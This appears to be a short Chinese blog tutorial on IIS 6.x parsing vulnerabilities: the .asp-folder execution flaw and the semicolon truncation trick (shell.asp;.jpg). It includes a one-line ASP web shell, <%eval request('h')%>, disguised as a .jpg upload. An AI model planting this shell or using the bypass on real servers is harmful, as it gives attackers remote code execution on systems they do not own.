IIS解析漏洞

Zmxcl-0072024-12-23 14:15

IIS6.X

在iis6.x中,.asp文件夹中的任意文件都会被当做asp文件去执行

在默认网站里创建一个a.asp文件夹并创建一个1.jpg写进我们的asp代码

<%=now()%>

#asp一句话

<%eval request("h")%>

单独创建一个1.jpg发现并不能解析

在a.asp下被解析

在IIS 6 处理文件解析时,分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是

shell.asp。另外IIS6.0默认的可执行文件除了asp还包含 asa\cer\cdx

相关推荐
i***27951 分钟前
Oracle分页sql
数据库·sql·oracle
铃汐留1 分钟前
MongoDB设置密码并使用MongoDB Compass连接
数据库·mongodb
i***17182 分钟前
mysql如何发现慢查询sql
数据库·sql·mysql
阿宁又菜又爱玩17 分钟前
MySQL基础学习
数据库·学习·mysql
杰 .23 分钟前
Linux yum_and_apt
linux·服务器
3***891925 分钟前
sql实战解析-sum()over(partition by xx order by xx)
数据库·sql
Data_agent30 分钟前
1688获得1688公司档案信息API,python请求示例
开发语言·数据库·python
q***017732 分钟前
Spring.factories
java·数据库·spring
南棱笑笑生36 分钟前
20251129给荣品RD-RK3588开发板跑Rockchip的原厂Buildroot【linux-6.1】系统时适配AP6275P的蓝牙BLE
linux·运维·服务器·rockchip
u***B79242 分钟前
Navicat for MySQL下载安装教程
数据库·mysql
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03BongoCat - 跨平台键盘猫动画工具04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05Linux下V2Ray安装配置指南06【保姆级教程】免费使用Gemini3的5种方法!免翻墙/国内直连0746个Nano-banana 精选提示词,持续更新中08Meta第三代“分割一切”模型——SAM 3本地部署教程:首支持文本提示分割,400万概念、30毫秒响应,检测分割追踪一网打尽09本地部署阿里最新开源的Z-Image10在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)